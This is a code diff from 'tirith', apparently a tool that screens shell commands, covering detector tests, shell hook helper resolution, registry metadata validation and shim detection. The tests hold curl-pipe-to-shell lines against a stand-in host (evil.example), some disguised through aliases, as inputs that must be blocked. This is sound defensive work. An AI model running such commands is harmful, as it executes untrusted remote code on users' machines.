+        "curl https://evil.example/install.sh | ~/bin/bash",
+    ] {
+        for context in [ScanContext::Exec, ScanContext::Paste] {
+            let verdict = analyze(input, context, true);
+            assert!(
+                verdict
+                    .findings
+                    .iter()
+                    .any(|finding| finding.rule_id == RuleId::CurlPipeShell),
+                "{input:?}: {verdict:?}"
+            );
+            assert_eq!(verdict.action, Action::Block, "{input:?}: {verdict:?}");
+        }
+    }
+}
+
+#[test]
+fn alias_listing_operands_cannot_replace_a_tracked_alias() {
+    let _state = GlobalStateGuard::new().unwrap();
+    for listing in ["-L", "-p"] {
+        let input = format!(
+            "alias sink='bash'\nalias {listing} sink=cat\ncurl https://evil.example/install.sh | sink"
+        );
+        let verdict = analyze(&input, ScanContext::Exec, true);
+        assert!(
+            verdict
+                .findings
+                .iter()
+                .any(|finding| finding.rule_id == RuleId::CurlPipeShell),
+            "{input:?}: {verdict:?}"
+        );
+    }
+}
+
+#[test]
+fn dynamic_leaders_and_reparsed_home_expansions_remain_incomplete() {
+    let _state = GlobalStateGuard::new().unwrap();
+    for input in [
+        "$COMMAND",
+        "eval \"$BODY\"",
+        "sh -c \"$BODY\"",
+        "~/$COMMAND",
+        "~/bin/*",
+        "~/bin/ba[sh]",
+        "~anotheruser/bin/tool",
+        "[[tool]]",
+        "env -S ~/bin/bash",
+        "[[ -e /tmp/example ]] && $COMMAND",
+    ] {
+        for context in [ScanContext::Exec, ScanContext::Paste] {
+            let verdict = analyze(input, context, true);
+            assert!(
+                verdict
+                    .findings
+                    .iter()
+                    .any(|finding| finding.rule_id == RuleId::AnalysisIncomplete),
+                "{input:?}: {verdict:?}"
+            );
+            assert_eq!(verdict.action, Action::Block, "{input:?}: {verdict:?}");
+        }
+    }
+}

--- a/crates/tirith/assets/shell/lib/bash-hook.bash
+++ b/crates/tirith/assets/shell/lib/bash-hook.bash
@@ -125,21 +125,40 @@ fi
 # long-lived interactive shell) Tirith's parent. Capture Tirith stdout in a
 # private temporary file instead: Tirith remains a direct child, parsing happens
 # in this shell, and every caller removes the file immediately.
-_TIRITH_MKTEMP_BIN=""
-[[ -f /usr/bin/mktemp && -x /usr/bin/mktemp ]] && _TIRITH_MKTEMP_BIN=/usr/bin/mktemp
-[[ -z "$_TIRITH_MKTEMP_BIN" && -f /bin/mktemp && -x /bin/mktemp ]] && _TIRITH_MKTEMP_BIN=/bin/mktemp
-_TIRITH_RM_BIN=""
-[[ -f /bin/rm && -x /bin/rm ]] && _TIRITH_RM_BIN=/bin/rm
-[[ -z "$_TIRITH_RM_BIN" && -f /usr/bin/rm && -x /usr/bin/rm ]] && _TIRITH_RM_BIN=/usr/bin/rm
-_TIRITH_MKDIR_BIN=""
-[[ -f /bin/mkdir && -x /bin/mkdir ]] && _TIRITH_MKDIR_BIN=/bin/mkdir
-[[ -z "$_TIRITH_MKDIR_BIN" && -f /usr/bin/mkdir && -x /usr/bin/mkdir ]] && _TIRITH_MKDIR_BIN=/usr/bin/mkdir
-_TIRITH_WC_BIN=""
-[[ -f /usr/bin/wc && -x /usr/bin/wc ]] && _TIRITH_WC_BIN=/usr/bin/wc
-[[ -z "$_TIRITH_WC_BIN" && -f /bin/wc && -x /bin/wc ]] && _TIRITH_WC_BIN=/bin/wc
-_TIRITH_STTY_BIN=""
-[[ -f /bin/stty && -x /bin/stty ]] && _TIRITH_STTY_BIN=/bin/stty
-[[ -z "$_TIRITH_STTY_BIN" && -f /usr/bin/stty && -x /usr/bin/stty ]] && _TIRITH_STTY_BIN=/usr/bin/stty
+# Prefer system helpers, then search the PATH present when this hook is sourced
+# for non-FHS systems (NixOS/Guix). Inspect files directly to ignore command
+# hashes, aliases and functions. Skip relative/empty entries so changing cwd or
+# PATH later cannot redirect a pinned helper to a repository executable.
+_tirith_resolve_helper() {
+  local name="$1" candidate directory remaining="${PATH-}"
+  shift
+  for candidate in "$@"; do
+    if [[ "$candidate" == /* && -f "$candidate" && -x "$candidate" ]]; then
+      builtin printf '%s\n' "$candidate"
+      return 0
+    fi
+  done
+  while [[ -n "$remaining" ]]; do
+    directory="${remaining%%:*}"
+    case "$remaining" in
+      *:*) remaining="${remaining#*:}" ;;
+      *) remaining="" ;;
+    esac
+    [[ "$directory" == /* ]] || continue
+    candidate="${directory%/}/$name"
+    if [[ -f "$candidate" && -x "$candidate" ]]; then
+      builtin printf '%s\n' "$candidate"
+      return 0
+    fi
+  done
+  return 1
+}
+
+_TIRITH_MKTEMP_BIN="$(_tirith_resolve_helper mktemp /usr/bin/mktemp /bin/mktemp)" || _TIRITH_MKTEMP_BIN=""
+_TIRITH_RM_BIN="$(_tirith_resolve_helper rm /bin/rm /usr/bin/rm)" || _TIRITH_RM_BIN=""
+_TIRITH_MKDIR_BIN="$(_tirith_resolve_helper mkdir /bin/mkdir /usr/bin/mkdir)" || _TIRITH_MKDIR_BIN=""
+_TIRITH_WC_BIN="$(_tirith_resolve_helper wc /usr/bin/wc /bin/wc)" || _TIRITH_WC_BIN=""
+_TIRITH_STTY_BIN="$(_tirith_resolve_helper stty /bin/stty /usr/bin/stty)" || _TIRITH_STTY_BIN=""
 
 _tirith_new_capture_file() {
   [[ -n "$_TIRITH_MKTEMP_BIN" && -n "$_TIRITH_RM_BIN" ]] || return 1

--- a/crates/tirith/assets/shell/lib/fish-hook.fish
+++ b/crates/tirith/assets/shell/lib/fish-hook.fish
@@ -31,50 +31,53 @@ if not string match -q '/*' -- "$_TIRITH_BIN"; or not test -x "$_TIRITH_BIN"
 end
 
 # Protocol-v3 callbacks run after arbitrary commands may have changed PATH.
-# Pin every external helper they use to a fixed system location now, and only
-# advertise receipt support when the complete helper set is available.
-set -g _TIRITH_MKTEMP_BIN ""
-if test -f /usr/bin/mktemp; and test -x /usr/bin/mktemp
-    set -g _TIRITH_MKTEMP_BIN /usr/bin/mktemp
-else if test -f /bin/mktemp; and test -x /bin/mktemp
-    set -g _TIRITH_MKTEMP_BIN /bin/mktemp
+# Prefer system helpers, then search the source-time PATH for non-FHS systems
+# (NixOS/Guix). Inspect files directly to ignore aliases, functions and command
+# caches. Relative/empty PATH entries must never become helper pins.
+function _tirith_resolve_helper
+    set -l name "$argv[1]"
+    for candidate in $argv[2..-1]
+        if string match -q '/*' -- "$candidate"; and test -f "$candidate"; and test -x "$candidate"
+            builtin printf '%s\n' "$candidate"
+            return 0
+        end
+    end
+    for directory in $PATH
+        string match -q '/*' -- "$directory"; or continue
+        set -l candidate "$directory/$name"
+        if test -f "$candidate"; and test -x "$candidate"
+            builtin printf '%s\n' "$candidate"
+            return 0
+        end
+    end
+    return 1
 end
-set -g _TIRITH_RM_BIN ""
-if test -f /bin/rm; and test -x /bin/rm
-    set -g _TIRITH_RM_BIN /bin/rm
-else if test -f /usr/bin/rm; and test -x /usr/bin/rm
-    set -g _TIRITH_RM_BIN /usr/bin/rm
-end
-set -g _TIRITH_WC_BIN ""
-if test -f /usr/bin/wc; and test -x /usr/bin/wc
-    set -g _TIRITH_WC_BIN /usr/bin/wc
-else if test -f /bin/wc; and test -x /bin/wc
-    set -g _TIRITH_WC_BIN /bin/wc
-end
-set -g _TIRITH_ENV_BIN ""
-if test -f /usr/bin/env; and test -x /usr/bin/env
-    set -g _TIRITH_ENV_BIN /usr/bin/env
-else if test -f /bin/env; and test -x /bin/env
-    set -g _TIRITH_ENV_BIN /bin/env
-end
-set -g _TIRITH_SH_BIN ""
-if test -f /bin/sh; and test -x /bin/sh
-    set -g _TIRITH_SH_BIN /bin/sh
-else if test -f /usr/bin/sh; and test -x /usr/bin/sh
-    set -g _TIRITH_SH_BIN /usr/bin/sh
-end
-set -g _TIRITH_BASH_TIMEOUT_BIN ""
-if test -f /bin/bash; and test -x /bin/bash
-    set -g _TIRITH_BASH_TIMEOUT_BIN /bin/bash
-else if test -f /usr/bin/bash; and test -x /usr/bin/bash
-    set -g _TIRITH_BASH_TIMEOUT_BIN /usr/bin/bash
-end
+
+set -g _TIRITH_MKTEMP_BIN (_tirith_resolve_helper mktemp /usr/bin/mktemp /bin/mktemp)
+set -g _TIRITH_RM_BIN (_tirith_resolve_helper rm /bin/rm /usr/bin/rm)
+set -g _TIRITH_WC_BIN (_tirith_resolve_helper wc /usr/bin/wc /bin/wc)
+set -g _TIRITH_ENV_BIN (_tirith_resolve_helper env /usr/bin/env /bin/env)
+set -g _TIRITH_SH_BIN (_tirith_resolve_helper sh /bin/sh /usr/bin/sh)
+set -g _TIRITH_BASH_TIMEOUT_BIN (_tirith_resolve_helper bash /bin/bash /usr/bin/bash)
 set -g _TIRITH_V3_HELPERS_READY 1
 for helper in "$_TIRITH_MKTEMP_BIN" "$_TIRITH_RM_BIN" "$_TIRITH_WC_BIN" \
         "$_TIRITH_ENV_BIN" "$_TIRITH_SH_BIN"
     if not string match -q '/*' -- "$helper"; or not test -f "$helper"; or not test -x "$helper"
         set -g _TIRITH_V3_HELPERS_READY 0
     end
+end
+
+# Legacy preflight also requires private capture files. If these prerequisites
+# are absent at startup, leave Enter/paste bindings intact instead of installing
+# a hook that discards every command. Runtime capture failures still block.
+if status is-interactive
+    and begin
+        test -z "$_TIRITH_MKTEMP_BIN"; or test -z "$_TIRITH_RM_BIN"
+    end
+    builtin printf '%s\n' 'tirith: mktemp or rm unavailable; fish hooks disabled — install these helpers and restart the shell' >&2
+    set -g TIRITH_STATUS off
+    set -e _TIRITH_FISH_LOADED
+    return 0
 end
 
 # Receipt protocol state. Registration itself happens further down, after the

--- a/crates/tirith/assets/shell/lib/zsh-hook.zsh
+++ b/crates/tirith/assets/shell/lib/zsh-hook.zsh
@@ -34,28 +34,34 @@ if [[ -z "$_TIRITH_BIN" || ! -x "$_TIRITH_BIN" ]]; then
 fi
 
 # Protocol-v3 callbacks run after arbitrary commands may have changed PATH.
-# Pin every external helper they use to a fixed system location now, and only
-# advertise receipt support when the complete helper set is available.
-_TIRITH_MKTEMP_BIN=""
-[[ -f /usr/bin/mktemp && -x /usr/bin/mktemp ]] && _TIRITH_MKTEMP_BIN=/usr/bin/mktemp
-[[ -z "$_TIRITH_MKTEMP_BIN" && -f /bin/mktemp && -x /bin/mktemp ]] \
-  && _TIRITH_MKTEMP_BIN=/bin/mktemp
-_TIRITH_RM_BIN=""
-[[ -f /bin/rm && -x /bin/rm ]] && _TIRITH_RM_BIN=/bin/rm
-[[ -z "$_TIRITH_RM_BIN" && -f /usr/bin/rm && -x /usr/bin/rm ]] \
-  && _TIRITH_RM_BIN=/usr/bin/rm
-_TIRITH_WC_BIN=""
-[[ -f /usr/bin/wc && -x /usr/bin/wc ]] && _TIRITH_WC_BIN=/usr/bin/wc
-[[ -z "$_TIRITH_WC_BIN" && -f /bin/wc && -x /bin/wc ]] \
-  && _TIRITH_WC_BIN=/bin/wc
-_TIRITH_ENV_BIN=""
-[[ -f /usr/bin/env && -x /usr/bin/env ]] && _TIRITH_ENV_BIN=/usr/bin/env
-[[ -z "$_TIRITH_ENV_BIN" && -f /bin/env && -x /bin/env ]] \
-  && _TIRITH_ENV_BIN=/bin/env
-_TIRITH_SH_BIN=""
-[[ -f /bin/sh && -x /bin/sh ]] && _TIRITH_SH_BIN=/bin/sh
-[[ -z "$_TIRITH_SH_BIN" && -f /usr/bin/sh && -x /usr/bin/sh ]] \
-  && _TIRITH_SH_BIN=/usr/bin/sh
+# Prefer system helpers, then search the source-time PATH for non-FHS systems
+# (NixOS/Guix). Inspect files directly to ignore stale command hashes, aliases
+# and functions. Relative/empty PATH entries must never become helper pins.
+_tirith_resolve_helper() {
+  local name="$1" candidate directory
+  shift
+  for candidate in "$@"; do
+    if [[ "$candidate" == /* && -f "$candidate" && -x "$candidate" ]]; then
+      builtin print -r -- "$candidate"
+      return 0
+    fi
+  done
+  for directory in "${path[@]}"; do
+    [[ "$directory" == /* ]] || continue
+    candidate="${directory%/}/$name"
+    if [[ -f "$candidate" && -x "$candidate" ]]; then
+      builtin print -r -- "$candidate"
+      return 0
+    fi
+  done
+  return 1
+}
+
+_TIRITH_MKTEMP_BIN="$(_tirith_resolve_helper mktemp /usr/bin/mktemp /bin/mktemp)" || _TIRITH_MKTEMP_BIN=""
+_TIRITH_RM_BIN="$(_tirith_resolve_helper rm /bin/rm /usr/bin/rm)" || _TIRITH_RM_BIN=""
+_TIRITH_WC_BIN="$(_tirith_resolve_helper wc /usr/bin/wc /bin/wc)" || _TIRITH_WC_BIN=""
+_TIRITH_ENV_BIN="$(_tirith_resolve_helper env /usr/bin/env /bin/env)" || _TIRITH_ENV_BIN=""
+_TIRITH_SH_BIN="$(_tirith_resolve_helper sh /bin/sh /usr/bin/sh)" || _TIRITH_SH_BIN=""
 _TIRITH_V3_HELPERS_READY=1
 for _tirith_helper in "$_TIRITH_MKTEMP_BIN" "$_TIRITH_RM_BIN" "$_TIRITH_WC_BIN" \
   "$_TIRITH_ENV_BIN" "$_TIRITH_SH_BIN"; do
@@ -63,6 +69,17 @@ for _tirith_helper in "$_TIRITH_MKTEMP_BIN" "$_TIRITH_RM_BIN" "$_TIRITH_WC_BIN" 
     || _TIRITH_V3_HELPERS_READY=0
 done
 unset _tirith_helper
+
+# Legacy preflight also requires private capture files. If these prerequisites
+# are absent at startup, leave the user's Enter/paste bindings intact instead
+# of installing a hook that discards every command. Runtime capture failures
+# still block: they must not provide a way to bypass an already-active hook.
+if [[ -o interactive && ( -z "$_TIRITH_MKTEMP_BIN" || -z "$_TIRITH_RM_BIN" ) ]]; then
+  builtin print -u2 -r -- "tirith: mktemp or rm unavailable; zsh hooks disabled — install these helpers and restart the shell"
+  TIRITH_STATUS=off
+  unset _TIRITH_ZSH_LOADED
+  return 0
+fi
 
 # One receipt protocol instance per sourced hook. It is deliberately
 # non-exported; only individual Tirith subprocesses receive it. Older binaries

--- a/crates/tirith/src/bin/tirith_threatdb_compile.rs
+++ b/crates/tirith/src/bin/tirith_threatdb_compile.rs
@@ -210,11 +210,12 @@ const MAX_BOUNDED_PACKAGE_REQUESTS: usize = 2_000;
 const REGISTRY_FETCH_CONCURRENCY: usize = 8;
 // npm's abbreviated metadata keeps every `versions` key while dropping READMEs
 // and per-version manifests (@solana/web3.js: 11,975,695 -> 4,688,592 bytes).
-// PyPI has no abbreviated representation. The requested media type is recorded
+// PyPI has no abbreviated representation. The served media type is recorded
 // per package in the snapshot and verified on load, so the reviewed response
 // shape is part of the provenance rather than an ambient client default.
 const NPM_REGISTRY_MEDIA_TYPE: &str = "application/vnd.npm.install-v1+json";
 const JSON_MEDIA_TYPE: &str = "application/json";
+const NPM_REGISTRY_BINARY_MEDIA_TYPE: &str = "application/octet-stream";
 const PYPI_REGISTRY_MEDIA_TYPE: &str = JSON_MEDIA_TYPE;
 const REGISTRY_SNAPSHOT_SCHEMA_VERSION: u32 = 2;
 // The largest reviewed response was @solana/web3.js at 11,975,695 bytes as a
@@ -3947,8 +3948,7 @@ fn registry_metadata_url(key: &RegistryPackageKey) -> FeedResult<url::Url> {
 }
 
 /// The exact `Accept` value sent for one ecosystem's metadata request. It is
-/// recorded in the snapshot and verified on load so the reviewed response
-/// shape is bound into provenance.
+/// independent of the served Content-Type recorded in the snapshot.
 fn registry_media_type(ecosystem: Ecosystem) -> FeedResult<&'static str> {
     match ecosystem {
         Ecosystem::Npm => Ok(NPM_REGISTRY_MEDIA_TYPE),
@@ -4059,6 +4059,21 @@ fn parse_registry_document(key: &RegistryPackageKey, bytes: &[u8]) -> FeedResult
     let document = document
         .as_object()
         .ok_or_else(|| format!("registry response for {} is not a JSON object", key.name))?;
+    // Bind a positive version list to the requested package as well as its
+    // registry URL. In particular, npm's occasional octet-stream metadata
+    // response must still be a recognizable packument for this package.
+    let name = match key.ecosystem {
+        Ecosystem::Npm => document.get("name"),
+        Ecosystem::PyPI => document.get("info").and_then(|info| info.get("name")),
+        _ => None,
+    }
+    .and_then(serde_json::Value::as_str);
+    if !name.is_some_and(|name| canonical_package_name(key.ecosystem, name) == key.name) {
+        return Err(format!(
+            "registry response for {} has missing or mismatched package identity",
+            key.name
+        ));
+    }
     let Some(value) = document.get(field) else {
         if key.ecosystem == Ecosystem::Npm && npm_unpublished_stub_is_authentic(key, document) {
             return Ok(RegistryDocument::NpmUnpublishedStub);
@@ -4116,7 +4131,9 @@ fn registry_not_found_body_is_authentic(ecosystem: Ecosystem, bytes: &[u8]) -> b
 /// recorded value is what the registry actually served (the Content-Type
 /// essence), which is what the hashed bytes are, not what was requested. npm
 /// may ignore `Accept` and serve the full document; both shapes parse and the
-/// per-response byte cap still bounds them.
+/// per-response byte cap still bounds them. Some npm edges label HTTP 200
+/// metadata as octet-stream; it is accepted only for npm, with the same JSON
+/// shape and package identity validation as a JSON-labelled response.
 fn registry_media_type_is_allowed(
     ecosystem: Ecosystem,
     http_status: u16,
@@ -4124,7 +4141,9 @@ fn registry_media_type_is_allowed(
 ) -> bool {
     match (ecosystem, http_status) {
         (Ecosystem::Npm, 200) => {
-            media_type == NPM_REGISTRY_MEDIA_TYPE || media_type == JSON_MEDIA_TYPE
+            media_type == NPM_REGISTRY_MEDIA_TYPE
+                || media_type == JSON_MEDIA_TYPE
+                || media_type == NPM_REGISTRY_BINARY_MEDIA_TYPE
         }
         (Ecosystem::Npm, 404) | (Ecosystem::PyPI, 200) | (Ecosystem::PyPI, 404) => {
             media_type == JSON_MEDIA_TYPE
@@ -4191,6 +4210,15 @@ fn fetch_registry_snapshot_package(
     let accept = registry_media_type(key.ecosystem)?;
     let (http_status, media_type, bytes) =
         fetch_registry_document(client, &url, accept, &key.name)?;
+    registry_snapshot_package_from_response(key, http_status, media_type, &bytes)
+}
+
+fn registry_snapshot_package_from_response(
+    key: &RegistryPackageKey,
+    http_status: u16,
+    media_type: String,
+    bytes: &[u8],
+) -> FeedResult<RegistrySnapshotPackage> {
     if !registry_media_type_is_allowed(key.ecosystem, http_status, &media_type) {
         return Err(format!(
             "registry response for {} has unexpected media type {media_type:?} for HTTP {http_status}",
@@ -4198,7 +4226,7 @@ fn fetch_registry_snapshot_package(
         ));
     }
     let (resolution, versions) = if http_status == 404 {
-        if !registry_not_found_body_is_authentic(key.ecosystem, &bytes) {
+        if !registry_not_found_body_is_authentic(key.ecosystem, bytes) {
             return Err(format!(
                 "registry 404 for {} does not carry the registry's own not-found document",
                 key.name
@@ -4206,7 +4234,7 @@ fn fetch_registry_snapshot_package(
         }
         (RegistrySnapshotResolution::PackageNotFound, Vec::new())
     } else {
-        match parse_registry_document(key, &bytes)? {
+        match parse_registry_document(key, bytes)? {
             RegistryDocument::Versions(versions) => {
                 (RegistrySnapshotResolution::RegistryVersions, versions)
             }
@@ -4218,11 +4246,11 @@ fn fetch_registry_snapshot_package(
     Ok(RegistrySnapshotPackage {
         ecosystem: key.ecosystem.to_string(),
         name: key.name.clone(),
-        source_url: url.to_string(),
+        source_url: registry_metadata_url(key)?.to_string(),
         media_type,
         http_status,
         resolution,
-        response_sha256: format!("{:x}", Sha256::digest(&bytes)),
+        response_sha256: format!("{:x}", Sha256::digest(bytes)),
         response_bytes: bytes.len(),
         versions,
     })
@@ -5985,7 +6013,7 @@ mod tests {
     }
 
     #[test]
-    fn registry_snapshot_binds_the_requested_media_type_and_schema() {
+    fn registry_snapshot_binds_the_served_media_type_and_schema() {
         let directory = tempfile::tempdir().unwrap();
         let snapshot_path = directory.path().join("registry-versions.json");
         let mut document: serde_json::Value = serde_json::from_str(C01_REGISTRY_VERSIONS).unwrap();
@@ -5996,6 +6024,12 @@ mod tests {
 
         // npm may ignore Accept and serve the full document: still valid.
         document["packages"][0]["media_type"] = serde_json::json!(JSON_MEDIA_TYPE);
+        std::fs::write(&snapshot_path, serde_json::to_vec(&document).unwrap()).unwrap();
+        let binding = fixture_snapshot_binding(&snapshot_path);
+        RegistrySnapshotStore::load(&snapshot_path, &binding).unwrap();
+
+        // npm edges may serve validated JSON bytes with an octet-stream label.
+        document["packages"][0]["media_type"] = serde_json::json!(NPM_REGISTRY_BINARY_MEDIA_TYPE);
         std::fs::write(&snapshot_path, serde_json::to_vec(&document).unwrap()).unwrap();
         let binding = fixture_snapshot_binding(&snapshot_path);
         RegistrySnapshotStore::load(&snapshot_path, &binding).unwrap();
@@ -6346,7 +6380,11 @@ mod tests {
             RegistryDocument::NpmUnpublishedStub
         );
         assert_eq!(
-            parse_registry_document(&key, br#"{"versions":{"1.0.0":{},"0.9.0":{}}}"#).unwrap(),
+            parse_registry_document(
+                &key,
+                br#"{"name":"ab-test-wordpress","versions":{"1.0.0":{},"0.9.0":{}}}"#
+            )
+            .unwrap(),
             RegistryDocument::Versions(vec!["0.9.0".to_string(), "1.0.0".to_string()])
         );
         // Everything else must fail closed rather than be read as "no versions".
@@ -6357,6 +6395,8 @@ mod tests {
             br#"{"name":"ab-test-wordpress","modified":"2025-10-10T10:44:23.849Z","error":"internal error"}"#,
             br#"{"name":"ab-test-wordpress","modified":"not-a-timestamp"}"#,
             br#"{"name":"some-other-package","modified":"2025-10-10T10:44:23.849Z"}"#,
+            br#"{"name":"some-other-package","versions":{"1.0.0":{}}}"#,
+            br#"{"versions":{"1.0.0":{}}}"#,
             br#"{"_id":"ab-test-wordpress","name":"ab-test-wordpress","time":{"modified":"2025-10-10T10:44:23.849Z","unpublished":{"time":"2025-10-10T10:44:23.849Z","versions":["1.18.3"]}}}"#,
             br#"{"_id":"ab-test-wordpress","name":"ab-test-wordpress","time":{"modified":"2025-10-10T10:44:23.849Z","unpublished":{"time":"2025-10-10T10:45:23.849Z","versions":["1.18.3"]}},"_rev":"2-b9dd1da47486cec5bb948497a8f1ba6d"}"#,
             br#"{"_id":"ab-test-wordpress","name":"ab-test-wordpress","time":{"modified":"2025-10-10T10:44:23.849Z","unpublished":{"time":"2025-10-10T10:44:23.849Z","versions":[]}},"_rev":"2-b9dd1da47486cec5bb948497a8f1ba6d"}"#,
@@ -6378,9 +6418,18 @@ mod tests {
         };
         assert!(parse_registry_document(&pypi, br#"{"name":"ab-test-wordpress"}"#).is_err());
         assert_eq!(
-            parse_registry_document(&pypi, br#"{"releases":{"1.0":{}}}"#).unwrap(),
+            parse_registry_document(
+                &pypi,
+                br#"{"info":{"name":"Ab_Test.Wordpress"},"releases":{"1.0":{}}}"#
+            )
+            .unwrap(),
             RegistryDocument::Versions(vec!["1.0".to_string()])
         );
+        assert!(parse_registry_document(
+            &pypi,
+            br#"{"info":{"name":"another-package"},"releases":{"1.0":{}}}"#
+        )
+        .is_err());
     }
 
     #[test]
@@ -6421,6 +6470,22 @@ mod tests {
             200,
             JSON_MEDIA_TYPE
         ));
+        assert!(registry_media_type_is_allowed(
+            Ecosystem::Npm,
+            200,
+            NPM_REGISTRY_BINARY_MEDIA_TYPE
+        ));
+        for (ecosystem, status) in [
+            (Ecosystem::Npm, 404),
+            (Ecosystem::PyPI, 200),
+            (Ecosystem::PyPI, 404),
+        ] {
+            assert!(!registry_media_type_is_allowed(
+                ecosystem,
+                status,
+                NPM_REGISTRY_BINARY_MEDIA_TYPE
+            ));
+        }
         assert!(registry_media_type_is_allowed(
             Ecosystem::Npm,
             404,
@@ -6510,6 +6575,81 @@ mod tests {
         let error =
             fetch_registry_document(&client, &url, NPM_REGISTRY_MEDIA_TYPE, "broken").unwrap_err();
         assert!(error.contains("returned 503"), "{error}");
+    }
+
+    #[test]
+    fn registry_octet_stream_metadata_requires_valid_json_for_the_requested_package() {
+        let key = RegistryPackageKey {
+            ecosystem: Ecosystem::Npm,
+            name: "web3-plugin-swisstronik".to_string(),
+        };
+        let body = br#"{"name":"web3-plugin-swisstronik","versions":{"0.0.1-security":{}}}"#;
+        let mut server = mockito::Server::new();
+        let served = server
+            .mock("GET", "/web3-plugin-swisstronik")
+            .match_header("accept", NPM_REGISTRY_MEDIA_TYPE)
+            .with_status(200)
+            .with_header("content-type", "Application/Octet-Stream; charset=utf-8")
+            .with_body(body)
+            .create();
+        let client = reqwest::blocking::Client::builder()
+            .redirect(reqwest::redirect::Policy::none())
+            .build()
+            .unwrap();
+        let url = url::Url::parse(&format!("{}/{}", server.url(), key.name)).unwrap();
+        let (status, media_type, bytes) =
+            fetch_registry_document(&client, &url, NPM_REGISTRY_MEDIA_TYPE, &key.name).unwrap();
+        served.assert();
+        let snapshot =
+            registry_snapshot_package_from_response(&key, status, media_type, &bytes).unwrap();
+        assert_eq!(snapshot.media_type, NPM_REGISTRY_BINARY_MEDIA_TYPE);
+        assert_eq!(snapshot.response_sha256, sha256_hex(body));
+        assert_eq!(snapshot.response_bytes, body.len());
+        assert_eq!(snapshot.versions, ["0.0.1-security"]);
+        assert!(matches!(
+            snapshot.resolution,
+            RegistrySnapshotResolution::RegistryVersions
+        ));
+
+        for body in [
+            br#"<html>temporary registry outage</html>"#.as_slice(),
+            b"\x1f\x8b\x08\x00",
+            br#"{"error":"Not found"}"#,
+            br#"{"name":"another-package","versions":{"0.0.1-security":{}}}"#,
+            br#"{"versions":{"0.0.1-security":{}}}"#,
+            br#"{"name":"web3-plugin-swisstronik","versions":{}}"#,
+            br#"{"name":"web3-plugin-swisstronik","versions":[]}"#,
+        ] {
+            assert!(
+                registry_snapshot_package_from_response(
+                    &key,
+                    200,
+                    NPM_REGISTRY_BINARY_MEDIA_TYPE.to_string(),
+                    body,
+                )
+                .is_err(),
+                "{}",
+                String::from_utf8_lossy(body)
+            );
+        }
+        assert!(registry_snapshot_package_from_response(
+            &key,
+            404,
+            NPM_REGISTRY_BINARY_MEDIA_TYPE.to_string(),
+            br#"{"error":"Not found"}"#,
+        )
+        .is_err());
+
+        let _oversized = server
+            .mock("GET", "/oversized")
+            .with_status(200)
+            .with_header("content-type", NPM_REGISTRY_BINARY_MEDIA_TYPE)
+            .with_body(vec![b' '; MAX_REGISTRY_RESPONSE_BYTES + 1])
+            .create();
+        let url = url::Url::parse(&format!("{}/oversized", server.url())).unwrap();
+        let error =
+            fetch_registry_document(&client, &url, NPM_REGISTRY_MEDIA_TYPE, &key.name).unwrap_err();
+        assert!(error.contains("exceeds byte cap"), "{error}");
     }
 
     #[test]

--- a/crates/tirith/src/cli/init.rs
+++ b/crates/tirith/src/cli/init.rs
@@ -47,9 +47,9 @@ fn check_path_shadow() -> Option<String> {
         .map(|p| p.display().to_string())
         .unwrap_or_else(|_| "unknown".into());
     Some(format!(
-        "tirith: WARNING: '{}' shadows this binary ({})\n\
+        "tirith: WARNING: '{}' may shadow this binary ({})\n\
          tirith: This may be a different package (e.g. pip-installed).\n\
-         tirith: Run '{}' to inspect, and remove the conflicting binary.",
+         tirith: Run '{}' to inspect these installations before removing anything.",
         shadows[0],
         our_exe,
         super::tirith_path_lookup_command(),

--- a/crates/tirith/src/cli/mod.rs
+++ b/crates/tirith/src/cli/mod.rs
@@ -1888,21 +1888,66 @@ fn resolve_tirith_on_path_from(path: &std::ffi::OsStr) -> Vec<std::path::PathBuf
     tirith_core::path_audit::which_all_os("tirith", path)
 }
 
+/// mise (formerly rtx) shims are symlinks to the manager executable, not to
+/// tirith. Recognize that launcher only when it sits in the same data root's
+/// `shims` directory as our managed `installs` tree. The data-root name is
+/// deliberately unrestricted for custom MISE_DATA_DIR/RTX_DATA_DIR locations.
+/// Never execute the launcher, or ignore arbitrary programs named mise/rtx.
+#[cfg(unix)]
+fn is_mise_shim_for_install(
+    path: &std::path::Path,
+    target: &std::path::Path,
+    current_exe: &std::path::Path,
+) -> bool {
+    if !matches!(
+        target.file_name().and_then(|name| name.to_str()),
+        Some("mise" | "rtx")
+    ) || !std::fs::symlink_metadata(path)
+        .map(|metadata| metadata.file_type().is_symlink())
+        .unwrap_or(false)
+    {
+        return false;
+    }
+    let Some(shims) = path.parent().and_then(|parent| parent.canonicalize().ok()) else {
+        return false;
+    };
+    if shims.file_name() != Some(std::ffi::OsStr::new("shims")) {
+        return false;
+    }
+    let Some(installs) = shims
+        .parent()
+        .and_then(|root| root.join("installs").canonicalize().ok())
+    else {
+        return false;
+    };
+    current_exe.starts_with(installs)
+}
+
 /// Find `tirith` executables on PATH that aren't the current binary, deduped by
 /// logical target path so duplicate PATH entries and shim aliases don't repeat.
 pub fn find_shadow_binaries() -> Vec<String> {
     let our_canonical = std::env::current_exe()
         .ok()
         .and_then(|p| resolve_effective_tirith_target(&p));
+    find_shadow_binaries_in(resolve_tirith_on_path(), our_canonical.as_deref())
+}
 
+fn find_shadow_binaries_in(
+    paths: Vec<std::path::PathBuf>,
+    our_canonical: Option<&std::path::Path>,
+) -> Vec<String> {
     let mut seen = std::collections::HashSet::new();
     let mut shadows = Vec::new();
 
-    for path in resolve_tirith_on_path() {
+    for path in paths {
         let canonical = resolve_effective_tirith_target(&path);
-        // Skip if it resolves to our own binary.
-        if let (Some(ours), Some(ref theirs)) = (&our_canonical, &canonical) {
+        // Skip if it resolves to our own binary or its managed launcher.
+        if let (Some(ours), Some(theirs)) = (our_canonical, canonical.as_deref()) {
             if ours == theirs {
+                continue;
+            }
+            #[cfg(unix)]
+            if is_mise_shim_for_install(&path, theirs, ours) {
                 continue;
             }
         }
@@ -2243,6 +2288,99 @@ mod tests {
             resolve_shim_target(&shim).unwrap().canonicalize().unwrap(),
             real.canonicalize().unwrap()
         );
+    }
+
+    #[cfg(unix)]
+    mod mise_shim_tests {
+        use super::super::find_shadow_binaries_in;
+        use std::fs;
+        use std::os::unix::fs::{symlink, PermissionsExt};
+        use std::path::{Path, PathBuf};
+
+        fn file(path: &Path) {
+            fs::create_dir_all(path.parent().unwrap()).unwrap();
+            fs::write(path, b"test executable").unwrap();
+        }
+
+        fn layout(root: &Path, manager: &str) -> (PathBuf, PathBuf) {
+            let current = root.join("custom-data/installs/github-sheeki03-tirith/0.4.1/tirith");
+            file(&current);
+            let launcher = root.join("bin").join(manager);
+            // If shadow detection ever executes this PATH-selected launcher,
+            // the sentinel makes that regression observable.
+            file(&launcher);
